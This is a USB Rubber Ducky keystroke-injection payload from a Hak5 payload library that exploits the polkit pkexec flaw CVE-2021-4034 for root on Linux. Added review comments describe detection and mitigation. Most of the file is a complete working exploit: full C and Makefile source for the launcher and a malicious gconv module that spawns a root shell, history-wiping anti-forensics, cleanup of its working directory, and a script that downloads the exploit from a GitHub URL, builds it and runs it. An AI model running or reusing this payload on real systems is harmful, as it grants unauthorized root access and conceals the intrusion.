hak5
GitHub Repository: hak5/usbrubberducky-payloads
Path: blob/master/payloads/library/execution/DawnKit/payload.txt
REM Title: pwnKit
REM Description: Privilege escalation in Unix-like operating systems via CVE-2021-4034 (polkit pkexec)
REM Author: drapl0n
REM Version: 1.0
REM Category: Privilege Escalation
REM Target: Unix-like operating systems
REM Attackmodes: HID
DELAY 1000
REM NOTE(review): keystroke injection starts here, so the payload depends on an
REM unlocked desktop session on a desktop that binds Ctrl-Alt-T to a terminal.
REM Locking idle sessions and authorizing USB HID devices before use (for
REM example with USBGuard) are the controls that apply at this step.
CTRL-ALT t
DELAY 1000
REM NOTE(review): anti-forensics. History is turned off for this shell, so the
REM commands typed below will not reach the history file; detection has to
REM come from process-execution telemetry (auditd execve records, EDR).
REM HISTFILE is already unset when `rm -f $HISTFILE` expands, so previously
REM saved history is left on disk and is still worth collecting.
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
ENTER
DELAY 400
REM Working directory is the fixed path /tmp/pwn. Creation of that directory,
REM and of the files written into it by the following STRING lines, is a
REM file-system indicator for this payload.
STRING mkdir /tmp/pwn && cd /tmp/pwn
ENTER
DELAY 400
REM Writes a Makefile whose targets create a file named gconv-modules and a
REM directory literally named "GCONV_PATH=." that receives a file "pwnkit.so:.".
REM NOTE(review): a directory whose name starts with "GCONV_PATH=" is unusual
REM in normal use and makes a good file-creation alert. The build relies on
REM make and a C compiler being present on the host.
STRING echo -e '"CFLAGS=-Wall\nTRUE=$(shell which true)\n\n.PHONY: all\nall: pwnkit.so cve-2021-4034 gconv-modules gconvpath\n\n.PHONY: clean\nclean:\n\trm -rf pwnkit.so cve-2021-4034 gconv-modules GCONV_PATH=./\n\tmake -C dry-run clean\n\ngconv-modules:\n\techo "module UTF-8// PWNKIT// pwnkit 1" > $@\n\n.PHONY: gconvpath\ngconvpath:\n\tmkdir -p GCONV_PATH=.\n\tcp -f $(TRUE) GCONV_PATH=./pwnkit.so:.\n\npwnkit.so: pwnkit.c\n\t$(CC) $(CFLAGS) --shared -fPIC -o $@ $<\n\n.PHONY: dry-run\ndry-run:\n\tmake -C dry-run"' > Makefile
ENTER
DELAY 400
REM Writes cve-2021-4034.c: a launcher that calls execve on /usr/bin/pkexec
REM with an argument vector holding only NULL and a hand-built environment.
REM NOTE(review): this is the CVE-2021-4034 pattern named in the file name.
REM Mitigation is a patched polkit; where patching is delayed, removing the
REM setuid bit from pkexec (chmod 0755 /usr/bin/pkexec) is the usual stopgap.
REM Detection: pkexec started with no arguments, and - verify on your
REM distribution - a pkexec log entry about a SHELL value not in /etc/shells.
STRING echo -e "#include <unistd.h>\n\nint main(int argc, char **argv)\n{\n\tchar * const args[] = {\n\t\tNULL\n\t};\n\tchar * const environ[] = {\n\t\t"\"pwnkit.so:.\"",\n\t\t"\"PATH=GCONV_PATH=.\"",\n\t\t"\"SHELL=/lol/i/do/not/exists\"",\n\t\t"\"CHARSET=PWNKIT\"",\n\t\t"\"GIO_USE_VFS=\"",\n\t\tNULL\n\t};\n\treturn execve("\"/usr/bin/pkexec\"", args, environ);\n}" > cve-2021-4034.c
ENTER
DELAY 400
REM Writes cve-2021-4034.sh, a script that would fetch the three source files
REM from the GitHub raw URL below with curl or wget, then build and run them.
REM In the lines shown here nothing runs this script; the sources are typed in
REM directly by the other STRING lines.
REM NOTE(review): the URL is still a useful proxy/DNS indicator for variants
REM of this payload that download rather than type the sources.
STRING echo -e ""'#!/usr/bin/env sh\n\nURL='https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/'\n\nfor EXPLOIT in "${URL}/cve-2021-4034.c" "${URL}/pwnkit.c" "${URL}/Makefile"\ndo\n\tcurl -sLO "$EXPLOIT" || wget --no-hsts -q "$EXPLOIT" -O "${EXPLOIT##*/}"\ndone\n\nmake\n\n./cve-2021-4034'"" > cve-2021-4034.sh
ENTER
DELAY 400
REM Writes pwnkit.c, the source of the shared object: gconv_init calls
REM setuid(0) and setgid(0), then execve on /bin/sh with a fixed PATH.
REM NOTE(review): because both C files use execve, a successful run on a
REM vulnerable host would show one process whose image changes from the
REM launcher to /usr/bin/pkexec to /bin/sh, ending as uid 0 with no polkit
REM authentication - alert on pkexec being replaced by a shell.
STRING echo -e "#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nvoid gconv(void) {\n}\n\nvoid gconv_init(void *step)\n{\n\tchar * const args[] = { "\"/bin/sh\"", NULL };\n\tchar * const environ[] = { "\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin\"", NULL };\n\tsetuid(0);\n\tsetgid(0);\n\texecve(args[0], args, environ);\n\texit(0);\n}" > pwnkit.c
ENTER
DELAY 200
REM Builds the sources with make and, if the build succeeds, runs the launcher.
REM NOTE(review): compiler activity under /tmp followed by execution of the
REM freshly built binary is a detection point. A noexec mount on /tmp is a
REM common hardening that - to be verified per host - interferes with this step.
STRING make && ./cve-2021-4034
ENTER
DELAY 4000
REM Cleanup: removes /tmp/pwn after the 4000 ms delay, so the files written by
REM this payload may be gone by the time of triage. Audit and EDR records of
REM the file creation and process execution are the durable evidence.
STRING rm -rf /tmp/pwn
ENTER